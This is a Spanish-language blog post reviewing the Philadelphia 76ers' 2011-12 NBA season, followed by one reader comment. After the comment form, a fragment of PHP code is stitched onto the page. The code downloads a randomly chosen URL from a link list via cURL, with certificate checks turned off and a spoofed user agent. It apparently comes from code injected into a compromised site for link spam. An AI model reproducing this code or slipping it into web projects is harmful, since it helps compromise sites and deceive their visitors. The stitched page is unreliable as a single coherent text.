Philadelpiha 76ers: Notable

15 de July de 2012 por Hynreck

turner e iguodalaLa extraña temporada vivida en Philadelphia, más allá de los resultados y las sensaciones, hace dificil sacar conclusiones válidas. Desconcertante, cuanto menos, la cantidad de giros vividos.

El equipo empezó como un tiro y ocupó los primeros puestos de la conferencia Este. Sin embargo, cuando parecía que todo iba viento en popa, con el equipo con un balance de 12-3, llegó un pequeño bajón a finales de enero que se convertiría en una crisis profunda ya entrados en febrero. Los playoffs llegaron a peligrar seriamente e incluso hubo voces pidiendo una reconstrucción total en la plantilla.

Los Sixers, finalmente y renqueando, consiguieron hacerse con la última plaza en el Este. No pintaba que pudiesen llegar más allá pero la baja de Rose mostró las brutales carencias de unos Bulls que se dejaron avasallar en primera ronda por los incrédulos chicos de Collins. Ya en semifinales de conferencia, y sin nada que perder, llevaron a los Celtics al séptimo partido, resultado final más que digno.

Sin embargo, esta temporada, que se preveía de crecimiento, ha despertado más dudas que ilusión -repetimos- pese al resultado final de la misma.

Holiday no ha dado el paso adelante que esperábamos en cuanto a su lectura de juego; Iguodala, pese a ser All-Star y ejercer de líder tanto en ataque como en defensa, sigue teniendo muchas papeletas para abandonar la franquicia, y Evan Turner no parece estar preparado para liderar un proyecto y, salvo cuatro partidos en los que le dieron galones a mediados de marzo, su aportación ha dejado bastante que desear y su tiro exterior (o más bien su carencia del mismo) es una tara que necesita solución urgentemente.

Hawes Holiday BrandElton Brand, recientemente amnistiado, dejó hace tiempo de ser Mr. 20-10 para ser Mr. 12-7. Los números no engañan y, siendo ventajistas, podríamos decir que su contratación fue un grave error (a toro pasado, todos somos Manolete). Fue una apuesta. Ha salido mal. Mejor mirar hacia delante.

La segunda unidad del equipo no funcionó mal -ya advertíamos que era su punto fuerte-, pero tampoco fue un factor diferencial. Lou Williams fue un arma poderosa desde el banquillo, uno de los mejores sextos hombres de la liga. El recientemente firmado Nick Young deberá ejercer su papel la temporada que viene. Williams, como FA., toma rumbo a Atlanta.

Otro Young, Thaddeus, parece estancado en cuanto a su rendimiento. Lleva tres años clavando los mismos números. En Philadelphia parece haber alcanzado su techo, un cambio de aires no le vendría mal.

La renovación de Spencer Hawes viene justificada por su gran inicio de temporada. Una inoportuna lesión le dejó prácticamente en seco dos meses. Tras su vuelta, a mediados de marzo, su nivel bajó, pero le ha bastado para firmar hasta 2014 por 13 millones.

El rookie Lavoy Allen ha sido una grata sorpresa, y Vucevic ha apuntado cosas interesantes. Eso no ha impedido que en el draft se hicieran con los servicios de Arnett Moultrie para reforzar el juego interior. La elección de Moe Harkless no se entiende, salvo que se busque la salida de Iguodala o de Thaddeus.

Un número 1 del draft también llega a la plantilla, un factor diferencial que les podría hacer luchar por el títul…, ah perdón, es Kwame Brown. 5 millones en 2 temporadas que se podrían haber empleado en _____________ (rellene usted mismo).

Con estos mimbres, no parece que puedan avanzar más de lo que han hecho este año. Thaddeus o Iguodala deberían servir como moneda de cambio. A principios de temporada decíamos que el objetivo debería ser el verano del 2013, sin embargo, este verano parece todo un poco más difícil.

Andre IguodalaLo mejor: El rendimiento en Playoffs. El All-Star de Iguodala.

Lo peor: El poco o nulo crecimiento de los jóvenes. La sensación de avanzar a la deriva.

Jugando a GM: Urge encontrar un base que compita con Holiday. Vía agencia libre podríamos optar por Jerryd Bayless, pero es demasiado parecido a lo que ya tenemos. Johny Flynn también podría ser una posibilidad. Incluso Derek Fisher sería una buena opción. Mi opción favorita era la vuelta de Andre Miller, aunque acaba de renovar con los Nuggets por tres años. Thaddeus Young, con Harkless por detrás para cubrir su baja, podría servir para conseguir su retorno a Philadelphia.

La salida de Iguodala debería servir para traer un interno de calidad. Un cambio factible podría ser nuestro Pau Gasol. No solucionaríamos los problemas de salario -resultaría preferible un expiring-, pero el equipo quedaría más compensado y daríamos responsabilidad a Turner.

Una vez conseguido Nick Young, deberíamos seguir buscando otra amenaza exterior. O.J. Mayo sería una opción perfecta.

Comenta

Un comentario a esta entrada

  1. Sancho88 dice:
    #1

    Como dices, no se entiende demasiado la apuesta por Harkless, y la amnistía a Brand abriría las puertas a un posible traspaso Iggy x Pau. Eso sí, los Sixers deben esperar a Howard para hacer su movimiento gordo. Si no hacen nada y se quedan como están no van a optar a nada, será otra temporada normalita y serán carne de primera ronda. Lo de este año fue un milagro por la lesión de Rose. Holiday está demasiado solo. Firmar un base veterano no les vendría mal o buscar a alguien tipo Rodney Stuckey o Marcus Thornton…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>